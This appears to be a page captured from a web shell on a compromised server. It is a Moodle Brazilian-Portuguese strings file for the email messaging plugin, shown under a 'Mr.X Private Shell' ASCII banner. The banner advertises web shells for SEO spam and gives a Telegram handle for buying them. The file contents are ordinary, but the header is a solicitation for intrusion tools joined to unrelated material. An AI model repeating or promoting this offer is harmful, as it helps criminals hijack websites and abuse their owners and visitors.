__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
// This file is part of Moodle - https://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle. If not, see <https://www.gnu.org/licenses/>.
/**
* Strings for component 'message_email', language 'pt_br', version '4.5'.
*
* @package message_email
* @category string
* @copyright 1999 Martin Dougiamas and contributors
* @license https://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
*/
defined('MOODLE_INTERNAL') || die();
$string['email'] = 'Enviar e-mail de notificações para';
$string['emaildigestunreadmessages'] = 'Mensagens não lidas';
$string['emaildigestviewallmessages'] = 'Ver todas mensagens';
$string['emailonlyfromnoreplyaddress'] = 'Sempre enviar e-mails do remetente "não responda"?';
$string['ifemailleftempty'] = 'Deixe em branco para enviar notificações para {$a}';
$string['messagedigestemailsubject'] = '{$a}: Resumo de mensagens';
$string['pluginname'] = 'E-mail';
$string['privacy:metadata:attachment'] = 'Um arquivo no sistema de arquivos.';
$string['privacy:metadata:attachname'] = 'O nome do arquivo anexado (extensão indica MIME).';
$string['privacy:metadata:externalpurpose'] = 'Essas informações são enviadas para um servidor SMTP externo para serem entregues como um e-mail ao destinatário.';
$string['privacy:metadata:fullmessage'] = 'A mensagem completa em um determinado formato.';
$string['privacy:metadata:fullmessagehtml'] = 'A versão completa da mensagem.';
$string['privacy:metadata:message_email_messages'] = 'Lista de usuários inscritos por um provedor LTI';
$string['privacy:metadata:message_email_messages:conversationid'] = 'O ID da conversa que está sendo enviada para';
$string['privacy:metadata:message_email_messages:messageid'] = 'O ID da mensagem que está sendo enviada';
$string['privacy:metadata:message_email_messages:useridto'] = 'O ID do usuário que está recebendo a mensagem';
$string['privacy:metadata:recipient'] = 'O destinatário da mensagem.';
$string['privacy:metadata:replyto'] = 'O endereço de e-mail para responder.';
$string['privacy:metadata:replytoname'] = 'Nome da resposta ao destinatário.';
$string['privacy:metadata:subject'] = 'A linha de assunto da mensagem.';
$string['privacy:metadata:userfrom'] = 'O usuário enviando a mensagem.';
$string['privacy:preference:email'] = 'Endereço de notificação de e-mail preferido';
$string['tasksendemail'] = 'Envios de resumo de mensagens';